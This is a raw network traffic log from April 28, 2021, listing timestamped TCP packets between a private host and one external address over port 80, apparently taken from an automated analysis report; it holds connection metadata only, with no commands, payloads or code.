                                                                                                                                          Apr 28, 2021 23:00:03.071373940 CEST4994780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.164596081 CEST8049947176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.168400049 CEST8049947176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.168744087 CEST4994780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.168759108 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.168992043 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169137001 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.169209003 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169225931 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169235945 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169251919 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169367075 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.169429064 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.169481039 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169547081 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.169661045 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169677019 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169754028 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.169847965 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.169863939 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.170032978 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.170049906 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.170061111 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.170165062 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.170269966 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.170336962 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.268955946 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.268976927 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.268985033 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269001007 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269104004 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269133091 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269159079 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269210100 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269301891 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269423962 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269503117 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269517899 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269596100 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269661903 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269680977 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269692898 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269701004 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269745111 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269779921 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269804955 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.269807100 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.269862890 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.270016909 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.270150900 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.270170927 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.270282984 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.270457983 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.270503044 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:03.270584106 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.270605087 CEST8049946176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:03.270648003 CEST4994680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.436389923 CEST4996080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.437843084 CEST4996180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.441786051 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.441811085 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.441962957 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.442020893 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.442325115 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.442342997 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.442358971 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.442374945 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.442389965 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.442404985 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.442475080 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.442531109 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.442559958 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.446908951 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.446930885 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.447118998 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.447175980 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.447458029 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.447474957 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.447484970 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.447630882 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.447994947 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.448097944 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.534781933 CEST8049960176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.534868956 CEST4996080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.536195040 CEST8049961176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.536307096 CEST4996180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.537075996 CEST4996180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.542396069 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.542485952 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.542681932 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.542752981 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.542999029 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.543044090 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.543061018 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.543087959 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.543174028 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.543561935 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.543589115 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.543639898 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.543669939 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.543803930 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.543821096 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.544003010 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.544033051 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.544318914 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.544343948 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.547079086 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.547111988 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.547130108 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.547317982 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.548167944 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.548317909 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.548522949 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.548542976 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.549083948 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.549238920 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.549475908 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.549520016 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.549923897 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.550364971 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.636394024 CEST8049961176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.640202999 CEST8049961176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.640341997 CEST4996180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.644340038 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.644772053 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.645049095 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.645080090 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.645320892 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.645662069 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.645679951 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.647165060 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.647485018 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.747508049 CEST8049959176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.747751951 CEST4995980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.750775099 CEST4996180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.752257109 CEST4996380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.847830057 CEST8049961176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.848073006 CEST4996180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.852540970 CEST8049963176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.852648973 CEST4996380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.853204012 CEST4996380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:06.953347921 CEST8049963176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.957252979 CEST8049963176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:06.957353115 CEST4996380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.061417103 CEST4996380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.063030005 CEST4996480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.158425093 CEST8049964176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.158623934 CEST4996480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.159348965 CEST4996480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.163121939 CEST8049963176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.163289070 CEST4996380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.252605915 CEST8049964176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.257025957 CEST8049964176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.257208109 CEST4996480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.373939991 CEST4996480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.375361919 CEST4996580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.467067003 CEST8049964176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.467252970 CEST4996480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.474958897 CEST8049965176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.475152016 CEST4996580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.475827932 CEST4996580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.577245951 CEST8049965176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.582061052 CEST8049965176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.582279921 CEST4996580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.689398050 CEST4996580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.691899061 CEST4996680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.790448904 CEST8049965176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.790577888 CEST4996580192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.791238070 CEST8049966176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.795859098 CEST4996680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.805188894 CEST4996680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:07.902900934 CEST8049966176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.906785011 CEST8049966176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:07.906982899 CEST4996680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.015310049 CEST4996680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.016958952 CEST4996880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.112709045 CEST8049966176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:08.112814903 CEST4996680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.114203930 CEST8049968176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:08.114342928 CEST4996880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.115504980 CEST4996880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.215775013 CEST8049968176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:08.220160007 CEST8049968176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:08.220299959 CEST4996880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.331342936 CEST4996880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.334105015 CEST4996980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.428312063 CEST8049968176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:08.428383112 CEST4996880192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.433406115 CEST8049969176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:08.433501959 CEST4996980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:08.434032917 CEST4996980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:10.968653917 CEST4997780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:10.969852924 CEST4997780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:10.971437931 CEST8049976176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:10.971524954 CEST4997680192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:11.065110922 CEST8049977176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:11.069154978 CEST8049977176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:11.069401979 CEST4997780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.109966040 CEST4997780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.111073971 CEST4997980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.205082893 CEST8049977176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.205167055 CEST4997780192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.206585884 CEST8049979176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.206695080 CEST4997980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.207299948 CEST4997980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.302855015 CEST8049979176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.306950092 CEST8049979176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.307023048 CEST4997980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.426542997 CEST4997980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.429092884 CEST4998080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.522384882 CEST8049979176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.522495031 CEST4997980192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.524586916 CEST8049980176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.524969101 CEST4998080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.526020050 CEST4998080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.621099949 CEST8049980176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.624404907 CEST8049980176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.624514103 CEST4998080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.733530998 CEST4998080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.734679937 CEST4998180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.830066919 CEST8049980176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.830167055 CEST4998080192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.835928917 CEST8049981176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.836078882 CEST4998180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.836747885 CEST4998180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:12.936342955 CEST8049981176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.940705061 CEST8049981176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:12.940956116 CEST4998180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.046355009 CEST4998180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.047434092 CEST4998280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.145571947 CEST8049982176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.145741940 CEST8049981176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.145884037 CEST4998180192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.146455050 CEST4998280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.146498919 CEST4998280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.245615959 CEST8049982176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.248759985 CEST8049982176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.250858068 CEST4998280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.359945059 CEST4998280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.362616062 CEST4998380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.378268003 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.456983089 CEST8049983176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.457153082 CEST4998380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.457870007 CEST8049982176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.457969904 CEST4998280192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.458813906 CEST4998380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.471816063 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.471982002 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.472501993 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.552994967 CEST8049983176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.557121992 CEST8049983176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.557271004 CEST4998380192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.565851927 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.566013098 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.566020966 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.566148043 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.566159964 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.566270113 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.566519022 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.566607952 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.566679001 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.566819906 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.566996098 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.567111969 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.567331076 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.567414999 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.567595005 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.567715883 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.567765951 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.567867041 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.568085909 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.568155050 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.661125898 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661158085 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661250114 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661269903 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661289930 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661328077 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.661366940 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.661371946 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661403894 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.661434889 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.661760092 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661839008 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.661880016 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661922932 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.661945105 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.661983013 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.662033081 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.662087917 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.662254095 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.662307024 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.662373066 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.662432909 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.662606955 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.662687063 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.662748098 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.662789106 CEST8049984176.111.174.114192.168.2.4
                                                                                                                                          Apr 28, 2021 23:00:13.662808895 CEST4998480192.168.2.4176.111.174.114
                                                                                                                                          Apr 28, 2021 23:00:13.662831068 CEST4998480192.168.2.4176.111.174.114
